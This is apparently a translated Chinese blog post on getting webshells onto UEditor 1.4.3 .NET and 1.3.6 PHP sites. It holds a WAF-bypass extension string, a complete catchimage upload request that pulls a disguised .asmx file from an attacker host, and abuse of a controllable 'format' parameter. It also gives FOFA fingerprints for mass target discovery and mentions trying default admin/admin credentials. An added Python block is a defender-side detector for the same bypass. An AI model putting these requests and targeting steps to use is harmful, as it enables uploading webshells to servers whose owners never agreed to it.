Original | ueditor1.4.3-asmx bypasses WAF
2022-07-25 03:38:00 【ECHO::】
Preface: I keep running into ueditor lately. During hvv a while ago some red teams also got a shell through it, so let's talk about uploading through this editor.
Last night a friend in the group sent over a ueditor editor upload. In short, he had bypassed the image restriction, and the URL ueditor fetched was in IP form, but uploading the webshell always returned 403. I poked at it too and summed up some reasons.
If the ueditor upload directory can execute scripts and it is only a simple WAF doing the blocking:
bypass poc: jpg?.a?s?m?x

First, the ueditor 1.4.3 editor vulnerability: it came out in 2018 as an upload in the .net version. The versions where upload and bypass work are:
ueditor/1.4.3 net
ueditor/1.3.6 net (did not work in actual testing)
ueditor/1.3.6 php
1.3.6 environment bypass:
Parsing vulnerabilities
ueditor 1.3.6, X-Powered-By: ThinkPHP + apache (newline parsing and suffix parsing)
In the above environment the file upload can be bypassed locally.
0x00 1.3.6 upload
In the upload file Uploader.class.php, line 192, the file suffix is controlled by $fileName = $format . $ext;
At line 226, $ext is not controllable:
// Uploader.class.php: the extension is whatever follows the last '.' of the client-supplied file name
private function getFileExt()
{
return strtolower( strrchr( $this->file[ "name" ] , '.' ) );
}

But in 1.3.6 file naming introduces this format function,
and in imageUp.php, lines 30-35, format is defined directly from a POST parameter, so this part is controllable.

Actual demonstration poc:
Pass a value in the format parameter, combined with the apache parsing vulnerability; for example, passing 1 lets you customize the file header.

0x02. 1.4.3 net version file upload
I often meet this version during hvv, but it is really hard to use:
1. the upload interface has to be reachable and not blocked by policy;
2. whether the upload can bypass the image check;
3. the script-execution policy of the upload directory (by 2022 most ueditor deployments have a policy in place).
I tested 10 or so ueditor sites, and most of them have a server-side script parsing policy.
Case 1: looking at a site for a group friend
Uploading aspx succeeded, but visiting it returned 403; uploading aspx with broken code reported an error but returned 200.
I don't know why; I think it may be a blacklist problem. I tested ashx, asmx and so on, and I don't think the server uses a regex.
Passive collection via google found a ueditor with the fingerprint (iis7.5 asp.net). Testing the site, I found the upload directory prohibits executing script files.

=========================================
In 2022, passive information collection via google is really of little use; most of it only serves as an entry point for finding sensitive information.
I tested 5-6 sites from google, and most of the collected results could not be played with, so I turned to fofa active collection.
A fingerprint: app="Baidu-UEditor" && server="Microsoft-IIS/7.5"
It turned out pretty well after a wave of testing.

Then tried admin / admin out of hand.
The collected results have the ueditor editor directory in a secondary directory.
Send the ueditor file upload poc:
POST /resources/htmleditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1
Host: rhost:rport
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
source%5B%5D=http://ip:port/asmxx.jpg?.asmx
Here, swap in the WAF bypass poc: jpg?.a?s?m?x

Seeing the upload succeed, back to the earlier topic: can the upload directory execute scripts?
asmx is how asp.net generates and sends messages over the SOAP protocol, so it can probably get past regex matching.
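As an added defender-side check that is not part of the original write-up: the code below inspects the source[] values of a catchimage request, takes the extension from the URL path only, and recovers a script extension hidden in the query string even when '?' is interleaved between its letters as in the poc above. The TEST-NET host address and the extension list are assumptions for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Server-side extensions a remote "image" URL must never resolve to on an
# ASP.NET host. The set is an assumption for this example; tune per deployment.
SCRIPT_EXTS = {"asmx", "ashx", "aspx", "asp", "asax", "ascx", "soap", "php"}


def inspect_source(raw: str) -> dict:
    """Examine one source[] value sent to the ueditor catchimage action.

    The real extension is taken from the URL path only. Everything after the
    first '?' is then collapsed ('?' and '&' removed) so a script extension
    smuggled into the query, whole ('x.jpg?.asmx') or with '?' interleaved
    between its letters ('jpg?.a?s?m?x'), is recovered and flagged.
    """
    value = unquote(raw)                     # undo a second layer of encoding
    name = urlsplit(value).path.rsplit("/", 1)[-1]
    path_ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    tail = value.split("?", 1)[1] if "?" in value else ""
    collapsed = re.sub(r"[?&]", "", tail).lower()
    smuggled = [e for e in re.findall(r"\.([a-z0-9]{2,6})", collapsed)
                if e in SCRIPT_EXTS]
    return {"url": value, "path_ext": path_ext, "smuggled": smuggled,
            "suspicious": bool(smuggled) or path_ext in SCRIPT_EXTS}


def inspect_request(query: str, body: str) -> list:
    """Return suspicious source[] findings for one controller.ashx request,
    given its query string and urlencoded form body."""
    params = dict(parse_qsl(query, keep_blank_values=True))
    if params.get("action") != "catchimage":
        return []
    findings = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key.startswith("source"):         # 'source[]' after decoding
            result = inspect_source(value)
            if result["suspicious"]:
                findings.append(result)
    return findings


if __name__ == "__main__":
    # Constructed sample: the bypass request from the write-up, with a
    # TEST-NET address standing in for the attacker-controlled host.
    hits = inspect_request("action=catchimage&encode=utf-8",
                           "source%5B%5D=http://203.0.113.5:8000/asmxx.jpg?.a?s?m?x")
    for h in hits:
        print(h["url"], "->", h["smuggled"])
```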


Summary:
1. For ueditor 1.4.3, bypassing the file upload on the main site is usually hard (403); most of the holes that come out are on C-segment hosts.
2. Do batch collection of ueditor assets via mapping engines.